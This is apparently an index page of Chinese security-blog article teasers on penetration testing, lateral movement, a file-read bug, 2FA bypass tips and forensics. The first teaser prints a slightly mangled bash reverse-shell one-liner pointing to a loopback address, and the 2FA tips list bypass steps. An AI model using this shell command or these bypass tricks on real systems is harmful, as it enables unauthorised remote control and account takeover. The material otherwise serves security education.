反弹:bash -I >& /tcp/dev/127.0.0.1/9999 0>&1反弹(反向):被控制端连接攻击者,攻击者监听端口等待被控制端连接我们bash -I 创建...
内网横向知识
0x00 利用 SMB 来进行横向移动smbexec 可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享,依赖于 445 端口。psexec简介psexec 是 windows 下非常...
微软官方项目OLive存在任意文件读取漏洞(暂未修复)
点击蓝字·关注我们全文 742 字,预计阅读时间 2 分钟前言最近看一个关于flask的send_file()函数滥用,导致任意文件读取的漏洞点。发现有研究者在2022年3月就发现...
谈谈数据泄露的排查方法
序言数据泄露对于企业和个人来说都是致命性的影响,企业在运营过程中,对数据的保护是至关重要的,如果企业的数据因内外部原因而出现数据泄露的情况,那么这必将对企业的正常运营发展带来风险和影响。下面就谈谈针对...
研究人员破解MEGA的“设计隐私”存储、加密。
MEGA声称其存储服务在设计上是私有的,但据研究人员称,该技术受到“严重”安全问题的困扰。MEGA 总部位于新西兰,是一个云存储服务和消息传递平台,为超过2.5 亿用户提供端到端加密。MEGA还允许用...
Web Tips
绕过身份认证响应/状态码操作。蛮力otp。OTP 使用后不会过期。从账户 A 和 V 请求 2 个令牌。在 V 的账户中使用 A 的令牌。尝试在不解决 2FA 的情况下直接转到仪表板 URL。如果不成...
内存取证实战应用之破解BitLocker加密
原文始发于微信公众号():内存取证实战应用之破解BitLocker加密
一次信息泄露到越权支付的实战
免责声明由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即...
实战|记一次某系统的渗透测试
开端前几个月被授权进行某大型运营商的渗透,在过程中也是遇到了一些比较有意思的东西,特此记录一波最开始是通过一个webpack+未授权访问的接口获取了另一个系统的权限,根据获取到的口令进行复用对其他资产...
每日小知识
PNG怎么识别PNG开头89 50 4E 47怎么修改图片横长,纵长分离PNG如图,在jfif中的PNG将其复制在此处新建新建后的PNGJFIF以FF D8开始以FF D9 结束ZIP伪加密50 4B...
推动漏洞修复路上的二三事儿(续)
接上一篇:《推动漏洞修复路上的二三事儿》“小张,我们部门的漏洞列表麻烦发我一下。”“漏洞信息都在漏洞管理系统上呢,可以直接查看,而且漏洞信息会定期更新,直接看会更方便一些呢。”“可是我看到的没那么多漏...
CISSP考试指南笔记:8.3 软件开发模型
Waterfall MethodologyThe Waterfall methodology uses a linear-sequential life-cycle approach,Each pha...
11679